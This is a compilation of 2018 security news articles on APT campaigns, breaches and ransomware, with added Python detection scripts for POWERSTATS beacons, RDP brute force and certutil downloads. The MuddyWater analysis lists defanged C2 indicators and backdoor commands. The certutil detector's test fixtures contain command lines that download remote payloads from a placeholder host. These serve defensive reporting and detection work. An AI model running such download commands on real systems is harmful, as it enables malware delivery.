According to the analysis of ClearSky Research Team and TrendMicro researchers, at the end of November, MuddyWater group hit Lebanon and Oman institutions and after a few days Turkish entities. The attack vector and the final payload of were the same: the usual macro-embedded document and the POWERSTAT backdoor respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi-Cybaze Zlab researchers analyzed the file “Cv.doc”, the blurred resume used by MuddyWater during their Lebanon/Oman campaign.

Technical Analysis

When the victim enables the MACRO execution, the malicious code creates an Excel document containing the necessary code to download the next-stage of the malicious implant. At the same time, it shows a fake error popup saying the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before the execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed into the new Excel downloads powershell code from an URL apparently referencing a PNG image file “http://pazazta[.]com/app/icon.png”. The downloaded payload is able to create three new local files:

  • C:\Windows\Temp\temp.jpg, containing Javascript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.
Figure 5. Downloaded Powershell code

As shown in the above figure, the first file to be executed is “Windows.vbe” which simply run the Javascript code contained into temp.jpg, using the CSCRIPT engine. After its decryption, it is possible to notice the JS purpose: delay the execution of another powershell payload.

Figure 6. Javascript code within “temp.jpg”

In fact, the next malicious stage is executed only when the “Math.round(ss) % 20 == 19” condition is met, otherwise it keeps re-executing itself. The “ss” variable stores the past seconds since 1 January 1970 00:00:00.

The final stage consists in the execution of the POWERSTATS backdoor contained into the “Microsoft.db” file. The backdoor contacts a couple of domain names: “hxxp://amphira[.com” and “hxxps://amorenvena[.com”, each one pointing to the same ip address 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTAT beaconing requests

One executed, the POWERSTAT malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind of request performed by the implant; during the analysis the following values were observed:

  • info: used in POST requests to send info about the victim;
  • live: used in POST requests as a ping mechanism;
  • cmd: used in both POST and GET requests. In the first case it sends the last command executed, in the second it retrieves a new command from the server;
  • res: used in POST requests to send the result of the last command that the malware executed.

The parameter “id”, instead, uniquely identifies the victim machine; it is computed from local system information, unlike the sample analyzed by Trend Micro, which used only the hard drive serial number. This identifier is also used to name a file created in the “C:\ProgramData\” folder to store temporary information.
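The request/parameter scheme just described is enough to build a first-pass detection over web proxy logs. The following is an added example written for this article, not code from the Yoroi analysis or from the malware: it assumes only what the text states (an HTTP “type” parameter taking the values info/live/cmd/res, with the methods listed above, and an “id” parameter carrying the victim identifier). The log format and every sample value in it are constructed; the hostnames reuse the defanged indicators quoted above and are refanged only for parsing.

```python
"""Detect POWERSTATS-style C2 beacons in web proxy logs (added example)."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Request types named in the analysis, with the HTTP methods documented for each.
POWERSTATS_TYPES = {
    "info": {"POST"},
    "live": {"POST"},
    "cmd": {"GET", "POST"},
    "res": {"POST"},
}

# Constructed proxy log lines: "<client_ip> <method> <url>".
SAMPLE_LOG = """\
10.0.0.5 POST http://amphira[.]com/index.php?type=info&id=A1B2C3D4
10.0.0.5 POST http://amphira[.]com/index.php?type=live&id=A1B2C3D4
10.0.0.5 GET http://amorenvena[.]com/index.php?type=cmd&id=A1B2C3D4
10.0.0.5 POST http://amorenvena[.]com/index.php?type=res&id=A1B2C3D4
10.0.0.9 GET http://intranet.example.test/search?type=cmd&q=git
10.0.0.7 GET http://news.example.test/article?id=42
10.0.0.8 POST http://amphira[.]com/index.php?type=bogus&id=ZZZZ
"""

LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<url>\S+)$")


def parse_line(line):
    """Split one constructed log line into ip/method/host/type/id, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, method, url = m.group("ip", "method", "url")
    url = url.replace("[.]", ".")  # refang defanged indicators before parsing
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    return {
        "ip": ip,
        "method": method,
        "host": parts.hostname,
        "type": query.get("type", [None])[0],
        "id": query.get("id", [None])[0],
    }


def is_powerstats_beacon(req):
    """True when 'type' is one of the observed values, used with the method the
    analysis documents for it, and a victim 'id' is present."""
    if req is None or req["id"] is None:
        return False
    methods = POWERSTATS_TYPES.get(req["type"])
    return methods is not None and req["method"] in methods


def find_beacons(log_text):
    """Return {(client_ip, victim_id): sorted distinct request types seen}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        req = parse_line(line)
        if is_powerstats_beacon(req):
            hits[(req["ip"], req["id"])].add(req["type"])
    return {key: sorted(types) for key, types in hits.items()}


def suspicious_hosts(log_text, min_types=2):
    """Flag a client only when it used several distinct request types with the
    same id: a lone 'type=cmd' in an unrelated web app is noise, the
    info/live/cmd/res cycle is the beacon pattern."""
    return {k: v for k, v in find_beacons(log_text).items() if len(v) >= min_types}


if __name__ == "__main__":
    for (ip, victim_id), types in suspicious_hosts(SAMPLE_LOG).items():
        print(f"{ip} id={victim_id} types={types}")
```

The id-plus-type correlation matters more than any single hostname: the C2 domains will change between campaigns, while the implant’s protocol vocabulary is what the analysis actually documents.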

Figure 9. Victim id creation

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file, it is possible to investigate the real capabilities of the POWERSTATS backdoor, identifying the functionalities supported by the implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64-encoded PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\ProgramData\LSASS” containing a PowerShell script and runs it.

Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities use simple and well-known techniques, such as redundant registry keys within the “Microsoft\Windows\CurrentVersion\Run” location:

Figure 11. Registry key based persistence mechanism

The second mechanism is the creation of a scheduled task named “MicrosoftEdge”, which runs every day at 12 o’clock.

Figure 12. Scheduled task installed by the malware

Conclusion

This latest campaign of the Iranian APT group “MuddyWater” is a clear example of how hacking groups can leverage built-in system tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also leverage macro-embedded documents as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially when carefully prepared and contextualized to lure specific victims.

Figure 13. MuddyWater’s infection chain

Technical details, including indicators of compromise and Yara rules, are reported in the analysis published on the Yoroi blog: https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.

Evidence in Marriott’s subsidiary Starwood hack points to China intel

According to a report published by Reuters, the massive Marriott data breach was carried out by Chinese state-sponsored hackers.

According to Reuters, people investigating the Marriott data breach believe that it was the result of a cyberattack carried out by Chinese hackers.

Last week Marriott International announced that hackers had compromised the guest reservation database at its Starwood hotels subsidiary and stolen the personal details of about 500 million guests.

Sources quoted by the news agency said the attack was carried out by Chinese intelligence to gather information.

“Hackers behind a massive breach at hotel group Marriott International Inc left clues suggesting they were working for a Chinese government intelligence gathering operation, according to sources familiar with the matter.” reads the article published by Reuters.

“Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, said three sources who were not authorized to discuss the company’s private probe into the attack.”

The attribution of the Marriott data breach is based on the analysis of tactics, techniques, and procedures (TTPs) that were previously associated with Chinese APT groups.

In particular, Reuters’ sources admitted that some of the tools were exclusively used by Chinese attackers. Attribution is also difficult because the security breach occurred back in 2014, which means that other threat actors may have had access to the Starwood systems since then.

Relations between China and the US are further complicated by the fact that the US Government has, on many occasions, accused Beijing of cyber espionage against Western entities.

Chinese authorities denied any involvement in the alleged cyber espionage operations.

“China firmly opposes all forms of cyber attack and cracks down on them in accordance with law,” Chinese Ministry of Foreign Affairs spokesman Geng Shuang told Reuters. “If offered evidence, the relevant Chinese departments will carry out investigations according to law.”

Starwood Data Breach

Marriott International bought Starwood Hotels and Resorts Worldwide in 2016 for $13 billion. The brand includes St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton and Design Hotels.

According to the company, hackers had access to Starwood’s guest reservation system since 2014 and copied and encrypted the information.

The intrusion was detected on September 8 when a monitoring system found evidence regarding an attempt to access the Starwood guest reservation database in the United States. Two months later, on November 19, an investigation confirmed the intrusion into the archive containing “guest information relating to reservations at Starwood properties on or before September 10, 2018.”

Unknown hackers accessed the personal information of nearly 327 million guests; the compromised records include names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, genders, arrival and departure information, and reservation dates.

Pierluigi Paganini

(Security Affairs – Marriott data breach, hacking)

Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool

Takuya Yoshida from Toyota’s InfoTechnology Center and his colleague Tsuyoshi Toyama are members of a Toyota team that developed the new tool, called PASTA (Portable Automotive Security Testbed).

PASTA is an open-source testing platform specifically designed for car hacking; it was developed to help experts test the cyber security features of modern vehicles.

At Black Hat Europe 2018, held in London, the duo presented the tool and confirmed that Toyota plans to share the specifications on GitHub and will start selling the fully built system in Japan.

The PASTA car hacking tool is contained in an 8 kg portable briefcase. The experts highlighted the automotive industry’s delay in developing cyber security for modern cars.

“The researchers integrated the tool with a driving simulator program, as well as with a model car to demonstrate some ways it can be used. PASTA also can be used for R&D purposes with real vehicles: that would allow a carmaker to test how a third party feature would affect the vehicle and its security, or reprogram firmware, for example.” reported DarkReading.

PASTA (Source: Dark Reading)

Taking a close look at the PASTA case, we find four ECUs inside, as well as a console to run tests of the car system’s operation or to carry out attacks, for example by injecting CAN messages.

“There was a delay in the development of cybersecurity in the automobile industry; [it’s] late,” explained Toyama.

Now automakers including Toyota are preparing for next-generation attacks, he said, but there remains a lack of security engineers who understand auto technology.

The tool allows researchers to test communications among vehicle components over the CAN protocol, as well as to analyze how the vehicle’s engine control units (ECUs) operate.

Note that PASTA was not designed for hacking scenarios like the one presented by the security duo Charlie Miller and Chris Valasek in 2015, when they remotely hacked a Fiat Chrysler connected car.

PASTA implements a simulation for remote operation of vehicle components and features, including wheels, brakes, windows, and other car functionalities.

“It’s small and portable so users can study, research, and hack with it anywhere,” continued the expert.

PASTA supports connections to OBD-II and RS232C ports, and a port for debugging or binary hacking.

“You can modify the programming of ECUs in C” as well, he said.

Future improvements planned for PASTA include the implementation of other connectivity features, including Ethernet, LIN, CAN FD, Wi-Fi and, of course, Bluetooth.

You can download the slides and the research paper from the following links:

• Download Presentation Slides
• Download White Paper

Pierluigi Paganini

(Security Affairs – car hacking, PASTA)

Ukraine’s SBU: Russia carried out a cyberattack on Judiciary Systems

Ukraine is accusing Russian intelligence services of carrying out cyberattacks against one of its government organizations.

Ukraine’s security service, the SBU, announced that it had blocked a cyber attack launched by Russian intelligence and aimed at breaching information and telecommunications systems used by the country’s judiciary.

Attackers launched a spear phishing attack using messages purporting to deliver accounting documents. The weaponized document included a strain of malware developed to exfiltrate data and disrupt the judiciary systems.

Ukrainian government experts were able to identify the command and control (C&C) infrastructure, which uses Russian IP addresses.

The attack was detected and neutralized as a result of collaboration between the State Service on Intellectual Property (SSIP) and the State Judicial Administration.

“Employees of the Security Service of Ukraine blocked the attempt of Russian special services to conduct a large-scale cyberattack on the information and telecommunication systems of the judiciary of Ukraine. Specialists of the SBU noted that the cyberattack began due to the sending by e-mail of counterfeit accounting documents infected by the virus.” reads the alert published by the SBU.

“After opening files on computers, malicious software for unauthorized interference with judicial information systems and theft of official information were hidden. Employees of the Security Service of Ukraine found that the detected virus program was connected from control-command servers that have, in particular, Russian IP addresses.”

In July, Ukraine’s SBU reportedly stopped a VPNFilter attack at a chlorine station; the malware had infected the network equipment of the facility, which supplies water treatment and sewage plants.

VPNFilter is a multi-stage, modular strain of malware with a wide range of capabilities for both cyber espionage and sabotage purposes, and it originates from Russia.

Technical analysis of the code revealed many similarities with another nation-state malware, BlackEnergy, which was specifically designed to target ICS-SCADA systems and is attributed to Russian threat actors. BlackEnergy is considered the key element in the attacks aimed at the Ukrainian power grid in 2015 and 2016, and it was also involved in attacks against mining and railway systems in the country.

This week, Adobe released security updates for Flash Player that address two vulnerabilities, including a zero-day flaw, tracked as CVE-2018-15982, exploited in targeted attacks.

Experts observed the exploitation of the Flash zero-day exploit in an attack aimed at the FSBI “Polyclinic No. 2” of the Administrative Directorate of the President of the Russian Federation.

Once opened, the decoy document shows a questionnaire for personnel of the Moscow-based hospital, while the zero-day exploit is executed in the background.

Gigamon has also published a blog post describing the flaw and the attack; the experts pointed out that the Russian-language decoy document was submitted to VirusTotal from a Ukrainian IP address. Qihoo 360 researchers observed that the attack was launched just days after the Kerch Strait incident of November 25, when Russian Federal Security Service (FSB) border service coast guard boats fired upon and captured three Ukrainian Navy vessels that had attempted to pass from the Black Sea into the Sea of Azov through the Kerch Strait on their way to the port of Mariupol.

Some of the injured crew members were taken to hospitals in Moscow and one of these hospitals could be the Polyclinic No. 2. Malicious documents involved in this attack were uploaded to VirusTotal from a Ukrainian IP address, which could indicate that Ukrainian cyberspies targeted the hospital to obtain information on the state of the crew members.

Pierluigi Paganini

(Security Affairs – Ukraine, Russia)

DHS and FBI published a joint alert on SamSam Ransomware

The US Department of Homeland Security (DHS) and the FBI issued a joint alert on SamSam attacks targeting critical infrastructure.

The US Department of Homeland Security (DHS) and the FBI published a joint alert on the activity associated with the infamous SamSam ransomware.

The SamSam hackers extorted over 200 organizations, including public institutions, municipalities, and hospitals; they have caused over $30 million in losses.

In March 2018, computer systems in the City of Atlanta were infected by the ransomware; the cyber attack was confirmed by city officials.

The ransomware infection caused the interruption of several of the city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

One of the latest attacks hit the Port of San Diego in September; the incident impacted the processing of park permits and record requests, along with other operations.

In February, SamSam ransomware infected over 2,000 computers at the Colorado Department of Transportation (DOT); the DOT shut down the infected workstations.

In August, the security firm Sophos published a report on the SamSam ransomware; its experts tracked Bitcoin addresses managed by the crime gang and discovered that the crooks had extorted nearly $6 million from victims since December 2015, when the ransomware appeared in the threat landscape.

“SamSam has earned its creator(s) more than US$5.9 Million since late 2015. 74% of the known victims are based in the United States. Other regions known to have suffered attacks include Canada, the UK, and the Middle East.” reads the report published by Sophos.

“The largest ransom paid by an individual victim, so far, is valued at US$64,000, a significantly large amount compared to most ransomware families.”

Sophos tracked the Bitcoin addresses reported in all the SamSam versions it has spotted and discovered that 233 victims paid an overall amount of $5.9 million; the security firm also estimated that the group is netting around $300,000 per month.

A few days ago, the U.S. DoJ charged two Iranian men, Faramarz Shahi Savandi (34) and Mohammad Mehdi Shah Mansouri (27), over their alleged role in creating and spreading the infamous SamSam ransomware.

According to the joint report, most of the victims were located in the United States.

“The SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally.” reads the alert.

“Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.”

SamSam actors leverage vulnerabilities in Windows servers to gain persistent access to the target network and move laterally to infect other hosts on the network.

According to the report, attackers used the JexBoss Exploit Kit to compromise JBoss applications. Threat actors use Remote Desktop Protocol (RDP) to gain persistent access to victims’ networks, relying on brute force attacks and stolen login credentials.

After obtaining access to the victim’s network, attackers escalate privileges, then drop and execute the malware.

“After gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims’ action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.” continues the alert.

According to the experts, attackers used stolen RDP credentials bought from darknet marketplaces, using them in attacks within hours of purchase.

The alert also includes technical details and the following recommendations to mitigate the threat:

  • Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology vendors to confirm that patches will not affect system processes.
  • Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.
  • Enable strong passwords and account lockout policies to defend against brute force attacks.
  • Where possible, apply two-factor authentication.
  • Regularly apply system and software updates.
  • Maintain a good back-up strategy.
  • Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.
  • When creating cloud-based virtual machines, adhere to the cloud provider’s best practices for remote access.
  • Ensure that third parties that require RDP access follow internal policies on remote access.
  • Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.
  • Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.
  • Restrict users’ ability (permissions) to install and run unwanted software applications.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
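The recommendation to capture RDP logins and review them for intrusion attempts is the one that most directly catches the access pattern the alert describes (brute-forced or purchased credentials followed by an interactive RDP logon). The following is an added example, not part of the DHS/FBI alert: it scores Windows Security events for RDP brute force. Event IDs 4625 (failed logon) and 4624 (successful logon) and logon type 10 (RemoteInteractive, i.e. RDP) are the standard Windows values; the event records themselves are constructed for illustration, and the field names follow a JSON export of the Security log.

```python
"""Flag RDP brute force, and brute force followed by success, in Windows
Security events (added example; sample records are constructed)."""
from collections import defaultdict
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10       # LogonType 10 = RemoteInteractive (RDP)
FAILED_LOGON = 4625       # "An account failed to log on"
SUCCESSFUL_LOGON = 4624   # "An account was successfully logged on"

# Constructed events: five failures from one external source in 20 seconds,
# then a success for the last account tried; plus a normal user's single typo.
SAMPLE_EVENTS = [
    {"EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.7", "TargetUserName": "administrator", "TimeCreated": "2018-11-30T02:00:01"},
    {"EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.7", "TargetUserName": "admin", "TimeCreated": "2018-11-30T02:00:04"},
    {"EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.7", "TargetUserName": "backup", "TimeCreated": "2018-11-30T02:00:09"},
    {"EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.7", "TargetUserName": "svc_sql", "TimeCreated": "2018-11-30T02:00:15"},
    {"EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.7", "TargetUserName": "jsmith", "TimeCreated": "2018-11-30T02:00:21"},
    {"EventID": 4624, "LogonType": 10, "IpAddress": "203.0.113.7", "TargetUserName": "jsmith", "TimeCreated": "2018-11-30T02:00:30"},
    {"EventID": 4625, "LogonType": 10, "IpAddress": "10.0.0.12", "TargetUserName": "mjones", "TimeCreated": "2018-11-30T09:15:00"},
    {"EventID": 4624, "LogonType": 10, "IpAddress": "10.0.0.12", "TargetUserName": "mjones", "TimeCreated": "2018-11-30T09:15:20"},
    {"EventID": 4624, "LogonType": 2, "IpAddress": "-", "TargetUserName": "mjones", "TimeCreated": "2018-11-30T09:30:00"},
]


def _ts(event):
    return datetime.fromisoformat(event["TimeCreated"])


def rdp_events(events):
    """Keep only RDP (RemoteInteractive) logon events."""
    return [e for e in events if e["LogonType"] == RDP_LOGON_TYPE]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return one alert per source IP whose RDP failures reach `threshold`
    within `window`. Each alert lists the accounts tried and whether the same
    source then logged on successfully, which turns a noisy scan into a
    probable compromise worth immediate response."""
    by_ip = defaultdict(list)
    for e in sorted(rdp_events(events), key=_ts):
        by_ip[e["IpAddress"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["EventID"] == FAILED_LOGON]
        for i in range(len(failures)):
            # sliding window anchored at failure i
            burst = [f for f in failures[i:] if _ts(f) - _ts(failures[i]) <= window]
            if len(burst) < threshold:
                continue
            last_fail = _ts(burst[-1])
            success = [e for e in evs
                       if e["EventID"] == SUCCESSFUL_LOGON and _ts(e) >= last_fail]
            alerts.append({
                "ip": ip,
                "failures": len(burst),
                "accounts": sorted({f["TargetUserName"] for f in burst}),
                "followed_by_success": bool(success),
                "compromised_accounts": sorted({e["TargetUserName"] for e in success}),
            })
            break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(alert)
```

A lockout policy, as the alert recommends, would have stopped this sequence before the fifth attempt; the detection is still worth running, because lockouts generate their own 4740 events and because an attacker using purchased credentials may need only one or two attempts, which is why the success-after-failure correlation, not the raw failure count, is the field to alert on.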

Pierluigi Paganini

(Security Affairs – SamSam ransomware, hacking)

CVE-2018-15982 Adobe zero-day exploited in targeted attacks

Adobe released security updates for Flash Player that address two vulnerabilities, including a critical flaw, tracked as CVE-2018-15982, exploited in targeted attacks.

Adobe fixed two flaws, including a critical use-after-free bug, tracked as CVE-2018-15982, exploited by an advanced persistent threat actor in an attack aimed at a healthcare organization associated with the Russian presidential administration.

The flaw could be exploited by attackers to execute arbitrary code; Adobe addressed it with the release of Flash Player 32.0.0.101 for Windows, macOS, Linux, and Chrome OS.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address one critical vulnerability in Adobe Flash Player and one important vulnerability in Adobe Flash Player installer.” reads the security advisory published by Adobe.

“Successful exploitation could lead to Arbitrary Code Execution and privilege escalation in the context of the current user respectively. Adobe is aware of reports that an exploit for CVE-2018-15982 exists in the wild.”

Adobe confirmed that it is aware of attacks exploiting the flaw in the wild.

Adobe has credited the following experts for reporting the CVE-2018-15982 flaw:

  • Chenming Xu and Ed Miles of Gigamon ATR
  • Yang Kang (@dnpushmen) and Jinquan (@jq0904) of Qihoo 360 Core Security (@360CoreSec)
  • He Zhiqiu, Qu Yifan, Bai Haowen, Zeng Haitao and Gu Liang of 360 Threat Intelligence of 360 Enterprise Security Group
  • independent researcher b2ahex

Attackers used decoy Word documents embedding a Flash file that exploits the zero-day vulnerability. The Word document is delivered in a RAR archive together with a JPG picture. When the Flash vulnerability is triggered, the malware extracts the RAT code embedded in the JPG picture.

“The attack strategy is very clever: Flash file with 0day vulnerability is inserted into decoy Word document which is compressed into one RAR file with a JPG picture. When Flash 0day vulnerability is triggered, it will extract out RAT from that JPG picture. Such trick aims to avoid detection of most security software. This RAT has same digital signature as one RAT which is very likely written by Hacking Team, latter was found August 2018. We believe that the new RAT is an upgrade version of Hacking Team’s RAT.” reads the analysis published by the 360 Enterprise Security Group.

“This vulnerability and exploitation code could be reused by cybercriminals even other APT groups for large-scale attacks, we would suggest users to take necessary protection, like applying latest Adobe Flash patch.”

“The vulnerability (CVE-2018-15982) allows for a maliciously crafted Flash object to execute code on a victim’s computer, which enables an attacker to gain command line access to the system.” reads the post published by Gigamon.

“The document was submitted to VirusTotal from a Ukrainian IP address and contains a purported employment application for a Russian state healthcare clinic.”

Experts observed the exploitation of the Flash zero-day exploit in an attack aimed at the FSBI “Polyclinic No. 2” of the Administrative Directorate of the President of the Russian Federation.

Once opened, the decoy document shows a questionnaire for personnel of the Moscow-based hospital, while the zero-day exploit is executed in the background.

Fractured Block Campaign: CARROTBAT dropper supports a dozen decoy document formats

Palo Alto Networks recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Experts from Palo Alto Networks have recently discovered a malware dropper, dubbed CARROTBAT, that supports a dozen decoy document file formats to drop many payloads.

Although CARROTBAT was first discovered in March 2018, in the past three months experts have observed an intensification of the activity associated with the dropper.

CARROTBAT was spotted while threat actors were using it to drop payloads in the South and North Korea region; the decoy documents used subjects such as cryptocurrencies, cryptocurrency exchanges, and political events.

“Unit 42 has uncovered a campaign leveraging a previously unreported customized dropper that is being used to deliver lures primarily pertaining to the South Korea and North Korea region. These lures revolve around a series of subjects, including various cryptocurrencies, cryptocurrency exchanges, and political events.” reads the analysis published by Palo Alto Networks.

CARROTBAT was used in an attack against a British government agency in December; at the time, threat actors used the decoy documents to drop the SYSCON backdoor.

Palo Alto Networks has detected 29 unique CARROTBAT samples since its discovery, containing a total of 12 unique decoy documents.

Palo Alto Networks tracks the CARROTBAT attacks as Fractured Block; the attackers used 11 decoy document file formats (.doc, .docx, .eml, .hwp, .jpg, .pdf, .png, .ppt, .pptx, .xls, and .xlsx).

In March, attackers were using the dropper to deliver different payloads, including old versions of the SYSCON RAT and new samples of the OceanSalt malware.

Experts pointed out that CARROTBAT is not sophisticated and implements only rudimentary command obfuscation.

Once the embedded decoy document is opened, an obfuscated command is executed on the system to download and execute a remote file via the Microsoft Windows built-in certutil utility.
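That execution step, a built-in Windows utility fetching a remote file right after a document is opened, is the most reliable thing to alert on, because the decoy formats and payloads change while the technique does not. The following is an added example, not Palo Alto Networks’ detection logic or anything from the dropper itself: it classifies process-creation records (Sysmon event 1 style, with Image, ParentImage and CommandLine fields) and raises the severity when certutil is spawned by a document handler, which is the situation the article describes. The records are constructed and the URLs in them are placeholders; `-urlcache -split -f` is certutil’s documented download syntax, and the third record shows a legitimate certificate check that must not trigger.

```python
"""Classify process-creation events for certutil-as-downloader activity
(added example; records and URLs are constructed placeholders)."""
import re

# Handlers for the decoy formats the article lists (.doc/.docx, .hwp, .xls, .ppt ...).
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "hwp.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

SAMPLE_PROCESS_EVENTS = [
    {   # decoy document spawning certutil to fetch a remote file
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "certutil.exe -urlcache -split -f http://PLACEHOLDER.example/payload C:\\Users\\Public\\a.exe",
    },
    {   # same tool from a shell: still a download, but no document context
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "certutil -urlcache -split -f https://PLACEHOLDER.example/update.bin update.bin",
    },
    {   # legitimate use: verifying a certificate chain, no URL argument
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "certutil -verify -urlfetch cert.cer",
    },
    {   # unrelated process
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe readme.txt",
    },
]


def _basename(path):
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return None (benign), 'medium' (certutil given a URL to fetch) or
    'high' (the same, but spawned by a document handler, i.e. a decoy was
    opened). Matching on the URL rather than on exact switches survives the
    rudimentary command obfuscation the article mentions."""
    if _basename(event["Image"]) != "certutil.exe":
        return None
    if not URL_RE.search(event["CommandLine"]):
        return None
    parent = _basename(event["ParentImage"])
    return "high" if parent in DOCUMENT_PARENTS else "medium"


def triage(events):
    """Return (severity, command line) for every event that is not benign."""
    results = []
    for e in events:
        severity = classify(e)
        if severity:
            results.append((severity, e["CommandLine"]))
    return results


if __name__ == "__main__":
    for severity, cmd in triage(SAMPLE_PROCESS_EVENTS):
        print(f"[{severity}] {cmd}")
```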

The analysis of timestamps associated with CARROTBAT samples revealed they have been compiled between March 2018 and September 2018.

Between March and July, experts observed attackers using the dropper to deliver multiple instances of SYSCON; since June, it has also been used to drop OceanSalt.

Experts discovered an infrastructure overlap between the CARROTBAT and KONNI malware families.

The Cisco Talos team discovered the KONNI malware in May, when it was used in targeted attacks aimed at organizations linked to North Korea.

The malware, dubbed “KONNI” by the researchers, went undetected for more than 3 years and was used in highly targeted attacks. It was able to avoid detection thanks to continuous evolution; recent versions are capable of executing arbitrary code on the target systems and stealing data.

In August, experts at Cylance noticed that the decoy document used in KONNI attacks is similar to the one used in recent campaigns of the DarkHotel APT.

“Finding CARROTBAT provided an important lynchpin in identifying Fractured Block Campaign activity. Using CARROTBAT, we were able to find related OceanSalt, SYSCON and KONNI activity.” Palo Alto Networks concludes.

“The various overlaps encountered are notable, and it is our suspicion that this threat activity may all belong to the same threat actor. However, we do not believe there to be enough evidence at this time to make this claim with complete certainty.”

Pierluigi Paganini

(Security Affairs – Sofacy, Brexit)

Email accounts of top NRCC officials were hacked in 2018

Threat actors had access to the email accounts of at least four NRCC aides and spied on thousands of sent and received emails for several months.

The email system at the National Republican Congressional Committee (NRCC), the Republican Party’s campaigning arm, was hacked.

The news was first reported by Politico; the committee later admitted the intrusion and confirmed that attackers had access to mail messages for months.

“The House GOP campaign arm suffered a major hack during the 2018 midterm campaigns, exposing thousands of sensitive emails to an outside intruder, according to three senior party officials.” states the report published by Politico.

“The email accounts of four senior aides at the National Republican Congressional Committee were surveilled for several months, the party officials said. The intrusion was detected in April by an NRCC vendor, who alerted the committee and its cybersecurity contractor. An internal investigation was initiated, and the FBI was alerted to the attack, said the officials, who requested anonymity to discuss the incident.”

An NRCC vendor alerted the committee and its cybersecurity contractor in April. The National Republican Congressional Committee alerted the authorities and launched an internal investigation.

Politico reported that senior House Republicans, including Speaker Paul Ryan of Wisconsin, Majority Leader Kevin McCarthy of California and Majority Whip Steve Scalise of Louisiana, were not informed of the intrusion until the media outlet reported it to the NRCC earlier this week.

It is a difficult moment for the Republican Party, which lost 40 seats and gave up majority control of the House to the Democrats in the 2018 mid-term election.

At the time of writing, the attack has not been attributed to a specific threat actor; in any case, it is clear that the hackers carried out a cyber espionage campaign.

